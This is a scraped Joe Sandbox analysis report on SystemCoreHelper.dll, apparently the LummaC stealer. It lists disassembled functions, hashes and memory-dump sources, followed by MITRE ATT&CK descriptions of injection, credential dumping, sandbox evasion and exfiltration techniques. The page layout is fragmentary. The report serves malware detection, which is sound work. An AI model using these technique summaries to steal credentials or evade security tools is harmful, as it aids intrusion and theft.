Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02819E77

Memory Dump Source

Source File: 0000001E.00000002.2220545121.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2810000_mxtvcgq32fe.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7af6ba10954f198fb6d92f45c7ed8b0ff37e38dbd2594f3fa6cc344d93769578
Instruction ID: f0f16de1d34b8a117fac4b155250b9867d18c71853cec0ab21f02cfb21c77c9b
Opcode Fuzzy Hash: 7af6ba10954f198fb6d92f45c7ed8b0ff37e38dbd2594f3fa6cc344d93769578
Instruction Fuzzy Hash: 083199B9D042589FCB10CFA9D584ADEFBF5BB09310F14902AE819B7350D375A945CF64

Non-executed Functions

Function 0058F670 Relevance: 15.3, Strings: 12, Instructions: 267COMMON

Download Yara Rule

Strings

y_~), xrefs: 0058F7D5
:&Dl, xrefs: 0058F7F3
=.dA, xrefs: 0058F81B
8,11, xrefs: 0058F728
<G24, xrefs: 0058F811
zaB, xrefs: 0058F732
WDHZ, xrefs: 0058F71E
KKPV, xrefs: 0058F714
3HcP, xrefs: 0058F8CB
*&?$, xrefs: 0058F7E9
O'TT, xrefs: 0058F7C1
7()&, xrefs: 0058F7DF

Memory Dump Source

Source File: 0000001E.00000002.2216327148.0000000000542000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00540000, based on PE: true

Associated: 0000001E.00000002.2216289562.0000000000540000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001E.00000002.2217426061.00000000005D2000.00000040.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_540000_mxtvcgq32fe.jbxd

Similarity

API ID:
String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
API String ID: 0-2264557016
Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction ID: c00e82d123b0ee2753dcae2422395cfa53d53eaba10d6375109a9b8d5813e31f
Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction Fuzzy Hash: 0E91C2B0204B818BD325CF3989917A3BFE2EF96304F19896DD5EB9B392D7346406CB51

Function 0059C920 Relevance: 10.4, Strings: 8, Instructions: 429COMMON

Download Yara Rule

Strings

Q:, xrefs: 0059C94E
e], xrefs: 0059C93E
C, xrefs: 0059C9CE
\, xrefs: 0059C9D6
2zS, xrefs: 0059CAF8
R[, xrefs: 0059C956
HI, xrefs: 0059CBB4
dW, xrefs: 0059C946

Memory Dump Source

Source File: 0000001E.00000002.2216327148.0000000000542000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00540000, based on PE: true

Associated: 0000001E.00000002.2216289562.0000000000540000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001E.00000002.2217426061.00000000005D2000.00000040.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_540000_mxtvcgq32fe.jbxd

Similarity

API ID:
String ID: 2zS$C$HI$Q:$R[$\$dW$e]
API String ID: 0-720759029
Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction ID: a2dee2a8152af95e3fbcdd4c4c24ec94df3fb5de72fc6547fec11be2d32f5a3e
Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction Fuzzy Hash: 67E1FBB5A08340ABEB10DF24CC85B5BBFA4FF86704F10892CF6959B291D375D805CB92

Analysis Process: powershell.exePID: 5436, Parent PID: 7188COMMON

Executed Functions

Function 05274910 Relevance: 5.4, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

Hhq, xrefs: 05274BBE
Hhq, xrefs: 05274984
(hq, xrefs: 05274958
Hhq, xrefs: 05274A89

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID: (hq$Hhq$Hhq$Hhq
API String ID: 0-3282986207
Opcode ID: 0ff6e1e502b4fa9b50e5135de3af47e3d94040f7ecbb21aa3be90442ab2254cd
Instruction ID: 5c9a2c551690d3b7eaf0de9c2dce9c1ca68e98ec7883cf0e89d53ae3a9566899
Opcode Fuzzy Hash: 0ff6e1e502b4fa9b50e5135de3af47e3d94040f7ecbb21aa3be90442ab2254cd
Instruction Fuzzy Hash: 73C10034B042598FCB15EB78D844A6EBBF6FFC9300B1484AAD45ACB251DB34DD0ACB90

Function 05274E40 Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

cdq, xrefs: 05274FFB
Hhq, xrefs: 052750A8

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID: Hhq$cdq
API String ID: 0-799836041
Opcode ID: e0c8ffc1bba3c45c94c4626e01afa3bb31d80193152ec46e1ac291a3db4bf232
Instruction ID: 2c1f7461cbf650fa354f5db5a7a4a2763f29f46ff567ab460fb1857f0ec50f50
Opcode Fuzzy Hash: e0c8ffc1bba3c45c94c4626e01afa3bb31d80193152ec46e1ac291a3db4bf232
Instruction Fuzzy Hash: 7261013470024A9FDB05EB78C9507AEB7EABFC9200F144029DA4ADF391DE74DD0683A1

Function 052729F0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e907f59dcffc91107992b3ad3b93bab1782d12e335708ee4dece40adff85676
Instruction ID: ceec6737b852e82adb72ec7508d87ffb8e80d64190d463e50d57f146132ecaa9
Opcode Fuzzy Hash: 3e907f59dcffc91107992b3ad3b93bab1782d12e335708ee4dece40adff85676
Instruction Fuzzy Hash: E2919E74A04609DFCB15CF99C494ABEFBB5FF48310B248699D81AAB3A5C735EC41CB90

Function 05272B00 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9606ba91affe86a9cdb23af182dd4ee2d0a22ca38e0e74fdb70c20e06def256
Instruction ID: 7ff143c18b94d6a3962735e92e676cd20dc94e880aa1f0d869c28207f1d58ea4
Opcode Fuzzy Hash: a9606ba91affe86a9cdb23af182dd4ee2d0a22ca38e0e74fdb70c20e06def256
Instruction Fuzzy Hash: 1A414878A10109DFCB06CF49C498EAAFBB5FF48310B258259C816AB364C736ED51CBA0

Function 05274440 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1263764d75c3c97df387cee35816a559df3254e2ded4de1c5af570576764c97a
Instruction ID: e5eccc9ee48229f6ef3b759672d13ac6540bbcd61c9c82d39d409df2b290634f
Opcode Fuzzy Hash: 1263764d75c3c97df387cee35816a559df3254e2ded4de1c5af570576764c97a
Instruction Fuzzy Hash: A1110424D093C98FCB16EBB899248AC7FB6BF8230071884EEC145CF2A3DE758905E751

Function 052749C0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a105d0dcd9282d102c39e27646fc9273b0bcbe7ff8b063c11217fccf8d0c12
Instruction ID: 36a14b397a444eecbfad7e8425a44757f9718961e77876ee0adcadaea158d6a9
Opcode Fuzzy Hash: 93a105d0dcd9282d102c39e27646fc9273b0bcbe7ff8b063c11217fccf8d0c12
Instruction Fuzzy Hash: 6F01F1756003A04FC721EB7CE80095EBFF2EFC5251704896EE559CF222E7749909CBA0

Function 035FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2257160176.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_35fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063219b8a5922e0d7d3d5474c463a8c4aae360356399bf8446c3ba9f5366bba9
Instruction ID: 214120b8c33b27b09cb0de30c269f366fca68139c52a234ee93b88b0e3991ed3
Opcode Fuzzy Hash: 063219b8a5922e0d7d3d5474c463a8c4aae360356399bf8446c3ba9f5366bba9
Instruction Fuzzy Hash: 4E01D4710053409FE710CA16EC84B67BFECEB51325F0CC86AEE480B25AD6799841C6B1

Function 035FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2257160176.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_35fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8f101640877259097b26450229193e8df181a01cb3e805d7833b5f92c44b6d
Instruction ID: 9d6b99f508e700da0bf01f46355d7291f5416f7808e68995f02007df2cc301aa
Opcode Fuzzy Hash: 0b8f101640877259097b26450229193e8df181a01cb3e805d7833b5f92c44b6d
Instruction Fuzzy Hash: BF012D7200E3C09FD7128B25D894B56BFB8EF53224F1D80DBD9888F1A7C2695849C772

Function 05274900 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3315af2f458e575c3e86ffe9f948642c701d8066777b8b879b6b7eb106bf1caf
Instruction ID: c0d4df0bb2ac7257f60079c5a0f987331742197a2cf7ba2ca77fb6fdfd89ee30
Opcode Fuzzy Hash: 3315af2f458e575c3e86ffe9f948642c701d8066777b8b879b6b7eb106bf1caf
Instruction Fuzzy Hash: FEF0C235604259AFCB10DB6CC8849CABFBAFF89210F14C1A6E448CB251D3309948C7D0

Function 05274AB8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042e0cd7a49291093a54fdd8743980ada9a6bd76672b5cd3c4a5a717d858c144
Instruction ID: 20d182b2948cb8996f156575886d0905e3045f61d5eca5b33edd8059ec0bec0c
Opcode Fuzzy Hash: 042e0cd7a49291093a54fdd8743980ada9a6bd76672b5cd3c4a5a717d858c144
Instruction Fuzzy Hash: 46F0B431E142959FCB11DFB998445DABBF1FF8921170085BAD0AAC6500E3359949DF90

Function 052752DE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad37e75aff877d8012a18dac7b25a725c4f2c4efd4b7e4aecd219c2d0b556e9c
Instruction ID: 7f4294dbbee3edcf3167efb7bbd4be08749ce200e2b92d9a0a77a482689ff397
Opcode Fuzzy Hash: ad37e75aff877d8012a18dac7b25a725c4f2c4efd4b7e4aecd219c2d0b556e9c
Instruction Fuzzy Hash: A5D017396506149FD341ABA8E41C99637BAFB89720B0141A6EA09CB322DA659C008BD1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SystemCoreHelper.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mxtvcgq32fe.exe_2711dd6c6a3b59b8793a33de2e9dd423a0e18fda_3fac82b3_3bc73dfe-16ee-4cd7-86e6-7d6e4a7cc3f2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zbjnkzvo4cc.exe_91fe3a34c9bbb1a5c2a345995be1177710a47ccf_18147d42_94eee511-b823-4a99-9fbc-9de814976ec1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9937.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9ADE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B0E.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA136.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA221.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA241.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
SystemCoreHelper.dll

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre